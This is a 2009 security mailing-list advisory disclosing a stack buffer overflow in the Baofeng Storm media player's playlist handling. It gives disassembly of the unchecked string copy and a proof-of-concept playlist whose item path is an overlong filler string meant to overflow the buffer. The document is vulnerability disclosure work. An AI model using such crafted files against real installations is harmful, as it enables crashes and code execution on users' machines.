[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <b48884620906281954j13076dd2y432ffd30382b5385@mail.gmail.com>
Date: Mon, 29 Jun 2009 10:54:05 +0800
From: "Jambalaya ." <jambalaya.maillist@...il.com>
To: Full-Disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Baofeng Media Player playlist stack overflow
vulnerability
Baofeng Media Player playlist stack overflow vulnerability
By Jambalaya of Nevis Labs
Date: 2009.06.24
Vender:
Baofeng
Affected:
Storm 3.9.62
*Other version may also be affected
Overview:
Baofeng is a widely popular media player in China, and it plays many common
media file formats. There are almost 120 million customer using baofeng
media player in China.
Details:
The specific flaws exists in medialib.dll. the stack overflow vulnerablility
is due to the way it incorrectly handle smpl file type which is a
playlist.Succssfully exploiting this vulnerability allows attackers to
execute arbitrary code on vulnerable installation.
the vulnerability could be triggered when it pass a long path, and lack
legal examine on the length of path:
.text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
.text:1000567B sub_1000567B proc near ; DATA XREF:
.rdata:100248D4.o
.text:1000567B
.text:1000567B FileName = word ptr -628h
.text:1000567B var_10 = dword ptr -10h
.text:1000567B var_C = dword ptr -0Ch
.text:1000567B var_4 = dword ptr -4
.text:1000567B pszUrl = dword ptr 8
.text:1000567B pcchPath = dword ptr 0Ch
.text:1000567B
.text:1000567B mov eax, offset sub_100221F8
.text:10005680 call __EH_prolog
.text:10005685 sub esp, 61Ch
.text:1000568B push ebx
.text:1000568C push esi
.text:1000568D mov esi, [ebp+pszUrl]
.text:10005690 mov [ebp+var_10], ecx
.text:10005693 test esi, esi
.text:10005695 jz loc_1000577D
.text:1000569B mov ebx, [ebp+pcchPath]
.text:1000569E test ebx, ebx
.text:100056A0 jz loc_1000577D
.text:100056A6 push edi
.text:100056A7 push esi ; pszPath
.text:100056A8 xor edi, edi
.text:100056AA mov [ebp+pcchPath], 208h
.text:100056B1 call ds:PathIsURLW
.text:100056B7 test eax, eax
.text:100056B9 jz short loc_100056E0
.text:100056BB push 3 ; UrlIs
.text:100056BD push esi ; pszUrl
.text:100056BE call ds:UrlIsW
.text:100056C4 test eax, eax
.text:100056C6 jz short loc_100056E0
.text:100056E0 loc_100056E0: ; CODE XREF:
sub_1000567B+3E.j
.text:100056E0 ; sub_1000567B+4B.j
.text:100056E0 lea eax, [ebp+FileName]
.text:100056E6 push esi
.text:100056E7 push eax
.text:100056E8 call ds:StrCpyW
<---------------------strcpy directly with out any examiation.
Proof of concept:
<playlist><item name="2.GIF" source="C:\Documents and
Settings\Linlin\桌面\2.GIF" duration="0"/><item name="0001.gif"
source="C:\Documents and
Settings\Linlin\桌面\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif"
duration="0"/></playlist>
Greetz to those friends who I have long time no see T_T:Pratik Dixit, Sanjay
pendse, Winny Thomas, ajit.hatti
Vendor Response:
2009.06.16 Vendor notified via email
2009.06.25 Vendor release new version
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists